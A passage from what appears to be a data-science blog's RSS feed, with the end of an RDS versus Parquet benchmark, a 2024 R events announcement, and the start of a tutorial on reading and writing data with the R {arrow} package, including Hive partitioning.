&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Default parquet compression is &amp;#34;snappy&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tf1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.parquet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_parquet&lt;/span&gt;(taxi_subset, sink &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tf1, compression &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;snappy&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tf2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.gzip.parquet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_parquet&lt;/span&gt;(taxi_subset, sink &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tf2, compression &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;gzip&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Reading in either file type is also straightforward&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;readRDS&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;taxi.rds&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Need to use collect() to make comparison far&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(file_path) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;collect&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="results"&gt;Results&lt;/h3&gt;
&lt;p&gt;Each test was run a couple of times, and the average is given in the
table below. The read times and size were fairly deterministic, but the
write times had massive variability.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr class="header"&gt;
&lt;th&gt;Method&lt;/th&gt;
&lt;th&gt;Compression&lt;/th&gt;
&lt;th&gt;Size (MB)&lt;/th&gt;
&lt;th&gt;Write Time (s)&lt;/th&gt;
&lt;th&gt;Read Time (s)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr class="odd"&gt;
&lt;td&gt;RDS&lt;/td&gt;
&lt;td&gt;gzip&lt;/td&gt;
&lt;td&gt;115&lt;/td&gt;
&lt;td&gt;27&lt;/td&gt;
&lt;td&gt;5.7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td&gt;Parquet&lt;/td&gt;
&lt;td&gt;snappy&lt;/td&gt;
&lt;td&gt;143&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;0.3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td&gt;Parquet&lt;/td&gt;
&lt;td&gt;gzip&lt;/td&gt;
&lt;td&gt;105&lt;/td&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;0.4&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;For me the results suggest that for files of this size, I would consider
using the native binary R format only if&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;the writing and reading file times weren’t an issue;&lt;/li&gt;
&lt;li&gt;and/or using the native binary R format (and the implied stability)
was really important.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;However, parquet and {arrow} do look appealing.&lt;/p&gt;
&lt;h3 id="when-should-we-use-parquet-over-rds"&gt;When Should we use Parquet over RDS?&lt;/h3&gt;
&lt;p&gt;The above timings are for a particular size data set (110MB). However, a
few quick experiments show the performance improvement is fairly
consistent for different file sizes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Writing (parquet vs rds): around 6 time faster using snappy, and
twice as fast using gzip;&lt;/li&gt;
&lt;li&gt;Reading (parquet vs rds): around 16 times faster using parquet.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So to answer the question, when should we use parquet over rds? For me
that depends. If it was for a standard analysis, and the files were
fairly modest (less than 20 MB), I would probably just go for an RDS
file. However, if I had a Shiny application, then this would
significantly lower the threshold where I would use parquet, for the
simple reason that &lt;a href="https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/" rel="external"&gt;one second on a web
application&lt;/a&gt;
feels like a lifetime. Remember that if you are using
&lt;a href="https://pins.rstudio.com/" rel="external"&gt;{pins}&lt;/a&gt;, then &lt;code&gt;pin_write()&lt;/code&gt; can handle
parquet files without any issue.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Events at Jumping Rivers 2024</title><link>https://www.jumpingrivers.com/blog/events-at-jr-2024/</link><pubDate>Thu, 25 Jan 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/events-at-jr-2024/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/events-at-jr-2024/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/events-at-jr-2024/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="satrdays-london-2024"&gt;SatRdays London 2024&lt;/h3&gt;
&lt;p&gt;Once again, we&amp;rsquo;re partnering up with &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt; to bring you a day of R themed talks in the centre of the UK capital. We&amp;rsquo;ll be returning to the amazing &lt;a href="https://en.wikipedia.org/wiki/Bush_House" rel="external"&gt;Bush House&lt;/a&gt; to hear experts in all things R share their knowledge and experience. The day is a great opportunity to meet like-minded data science enthusiasts - whether you&amp;rsquo;re brand new to R and data science, or been working in the field for years, the wide range of talks and networking opportunities make this a conference for all.&lt;/p&gt;
&lt;p&gt;Still not sure? Take a look at some of &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKLNjt5NnVQ1RgEKeayVVv6G&amp;si=mX9q3hBXioCPuNta" rel="external"&gt;last year&amp;rsquo;s talks on our YouTube channel&lt;/a&gt;! We recently closed for abstract submissions, so watch this space, as we&amp;rsquo;ll be releasing the final speaker lineup soon! Head over to the &lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; for more details, and to register!&lt;/p&gt;
&lt;h3 id="shiny-in-production-2024"&gt;Shiny in Production 2024&lt;/h3&gt;
&lt;p&gt;Shiny in Production is returning in 2024, and we&amp;rsquo;re looking forward to bringing you a wide range of speakers and workshops on all things Shiny (as well as other web-based R and visualisation themes)! We recently released the &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJcO4Srr6mnQorL3wFhiV7t&amp;si=oxLAmWkzzTC8rhV-" rel="external"&gt;recordings on YouTube&lt;/a&gt;, so head over to see what you can expect!&lt;/p&gt;
&lt;img src="everyone.jpg" alt="Line up of speakers from Shiny in Production 2023, all look happy and are holding brown gift bags. From left to right: Back row - Chris Brownlie, Colin Gillespie, Cara Thompson, Andrie de Vries, Liam Kalita, George Stagg; Front row - Janion Nevill, Anna Skrzydło, Clareece Nevill, Naomi Bradbury, Russ Hyde, Tan Ho." style="width: 600px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;We&amp;rsquo;re currently accepting abstracts for next year&amp;rsquo;s Shiny in Production! If you want to get involved, head over to the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; to submit your work!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/events-at-jr-2024/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Reading and Writing Data with {arrow}</title><link>https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/</link><pubDate>Thu, 18 Jan 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part of a series of related posts on Apache Arrow. Other posts
in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/" rel="external"&gt;Understanding the Parquet file
format&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Reading and Writing Data with {arrow} (This post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/" rel="external"&gt;Parquet vs the RDS Format&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="what-is-apache-arrow"&gt;What is (Apache) Arrow?&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://arrow.apache.org/" rel="external"&gt;Apache Arrow&lt;/a&gt; is a cross-language
development platform for in-memory data. As it’s in-memory (as opposed
to data stored on disk), it provides additional speed boosts. It’s
designed for efficient analytic operations, and uses a standardised
language-independent columnar memory format for flat and hierarchical
data. The {arrow} R package provides an interface to the &lt;a href="https://github.com/apache/arrow" rel="external"&gt;‘Arrow C++’
library&lt;/a&gt; - an efficient package for
analytic operations on modern hardware.&lt;/p&gt;
&lt;p&gt;There are many great tutorials on using
&lt;a href="https://github.com/apache/arrow" rel="external"&gt;{arrow}&lt;/a&gt; (see the links at the bottom
of the post for example). The purpose of this blog post isn’t to simply
reproduce a few examples, but to understand some of what’s happening
behind the scenes. In this particular post, we’re interested in
understanding the reading/writing aspects of {arrow}.&lt;/p&gt;
&lt;h3 id="getting-started"&gt;Getting started&lt;/h3&gt;
&lt;p&gt;The R package is installed from CRAN in the usual way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then loaded using&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This blog post uses the &lt;a href="https://www.nyc.gov/site/tlc/about/raw-data.page" rel="external"&gt;NYC Taxi
data&lt;/a&gt;. It’s pretty
big - around ~40GB in total. To download it locally,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data_nyc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;data/nyc-taxi&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;s3://voltrondata-labs-datasets/nyc-taxi&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2012&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2021&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_dataset&lt;/span&gt;(data_nyc, partitioning &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once this has completed, you can check everything has downloaded
correctly by running&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(data_nyc))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 1150352666&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;!-- We also use the Seattle checkouts data - a 9GB CSV file. --&gt;
&lt;!-- ```{r} --&gt;
&lt;!-- #| eval: false --&gt;
&lt;!-- options(timeout = 1800) --&gt;
&lt;!-- data_seattle = "data/seattle-library-checkouts.csv" --&gt;
&lt;!-- download.file( --&gt;
&lt;!-- url = "https://r4ds.s3.us-west-2.amazonaws.com/seattle-library-checkouts.csv", --&gt;
&lt;!-- destfile = data_seattle --&gt;
&lt;!-- ) --&gt;
&lt;!-- ``` --&gt;
&lt;h3 id="loading-in-data"&gt;Loading in data&lt;/h3&gt;
&lt;p&gt;Unsurprisingly, the first command we come across is &lt;code&gt;open_dataset()&lt;/code&gt;.
This opens the data and (sort of) reads it in.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(data_nyc)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## FileSystemDataset with 120 Parquet files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## vendor_name: string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## pickup_datetime: timestamp[ms]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## dropoff_datetime: timestamp[ms]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## passenger_count: int64&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## trip_distance: double&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Reading is a lazy action. This allows us to manipulate much larger data
sets than R could typically deal with. The default print method lists
the columns in the data set, with their associated type. These data
types come directly from the C++ API so don’t always have a
corresponding R type. For example, the &lt;code&gt;year&lt;/code&gt; column is an &lt;code&gt;int32&lt;/code&gt; (a 32
bit integer), whereas &lt;code&gt;passenger_count&lt;/code&gt; is &lt;code&gt;int64&lt;/code&gt; (a 64 bit integer).
In R, these are both integers.&lt;/p&gt;
&lt;p&gt;As you might guess, there’s a corresponding function &lt;code&gt;write_dataset()&lt;/code&gt;.
Looking at the (rather good) documentation, we come across a few
concepts that are worth exploring further.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-arrow-reading-writing-feather-hive"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="file-formats"&gt;File formats&lt;/h3&gt;
&lt;p&gt;The main file formats associated are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;parquet&lt;/code&gt;: a format designed to minimise storage - see our &lt;a href="https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/" rel="external"&gt;recent
blog
post&lt;/a&gt;
that delves into some of the details surrounding the format;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;arrow&lt;/code&gt;/&lt;code&gt;feather&lt;/code&gt;: in-memory format created to optimise vectorised
computations;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;csv&lt;/code&gt;: the world runs on csv files (and Excel).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The common workflow is storing your data as parquet files. The Arrow
library then loads the data and processes the data in the arrow format.&lt;/p&gt;
&lt;h4 id="storing-data-in-the-arrow-format"&gt;Storing data in the Arrow format&lt;/h4&gt;
&lt;p&gt;The obvious thought (to me at least) was, why not store the data as
arrow? Ignoring for the moment that Arrow &lt;a href="https://arrow.apache.org/faq/" rel="external"&gt;doesn’t
promise&lt;/a&gt; long-term archival storage using
the arrow format, we can do a few tests.&lt;/p&gt;
&lt;p&gt;Using the NYC-taxi data, we can create a quick subset&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Replace format = &amp;#34;arrow&amp;#34; with format = &amp;#34;parquet&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# to create the correspond&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# parquet equivalent&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(data_path, &lt;span style="color:#a5d6ff"&gt;&amp;#34;year=2019&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_dataset&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/nyc-taxi-arrow&amp;#34;&lt;/span&gt;, partitioning &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; format &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A very quick, but not particularly thorough test suggests that&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the arrow format requires ten times more storage space. So for the
entire &lt;code&gt;nyc-taxi&lt;/code&gt; data set, parquet takes around ~38GB, but arrow
would take around 380GB.&lt;/li&gt;
&lt;li&gt;storing as arrow makes some operations quicker. For the few examples I
tried, there was around a 10% increase in speed.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The large storage penalty was enough to convince me of the merits of
storing data as parquet, but there may be some niche situations where
you might switch.&lt;/p&gt;
&lt;h4 id="hive-partitioning"&gt;Hive partitioning&lt;/h4&gt;
&lt;p&gt;Both &lt;code&gt;open_dataset()&lt;/code&gt; and &lt;code&gt;write_dataset()&lt;/code&gt; functions mention “Hive
partitioning” - in fact we sneakily included a &lt;code&gt;partioning&lt;/code&gt; argument in
the code above. For the &lt;code&gt;open_dataset()&lt;/code&gt; function, it guesses if we use
Hive partitioning, whereas for the &lt;code&gt;write_dataset()&lt;/code&gt; function we can
specify the partition. But what actually is it?&lt;/p&gt;
&lt;p&gt;Hive partitioning is a method used to split a table into multiple files
based on partition keys. A partition key is a variable of interest in
your data, for example, year or month. The files are then organised in
folders. Within each folder, the &lt;strong&gt;key&lt;/strong&gt; has a value is determined by
the name of the folder. By partitioning the data in this way, we can
make it faster to do queries on data slices.&lt;/p&gt;
&lt;p&gt;Suppose we wanted to partition the data by year, then the file structure
would be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;taxi-data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;year&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2018&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file1.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file2.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;year&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2019&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file4.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file5.parquet
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Of course, we can partition by more than one variable, such as both year
&lt;strong&gt;and&lt;/strong&gt; month&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;taxi-data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;year&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2018&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;month&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;01&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file01.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;month&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;02&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file02.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file03.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ...
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;year&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2019&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;month&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;01&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ...
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;See the excellent vignette on
&lt;a href="https://arrow.apache.org/docs/r/articles/dataset.html" rel="external"&gt;datasets&lt;/a&gt; in the
{arrow} package.&lt;/p&gt;
&lt;h4 id="example-partitioning"&gt;Example: Partitioning&lt;/h4&gt;
&lt;p&gt;Parquet files aren’t the only files we can partition. We can also use
the same concept with CSV files. For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tmp_dir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempdir&lt;/span&gt;()
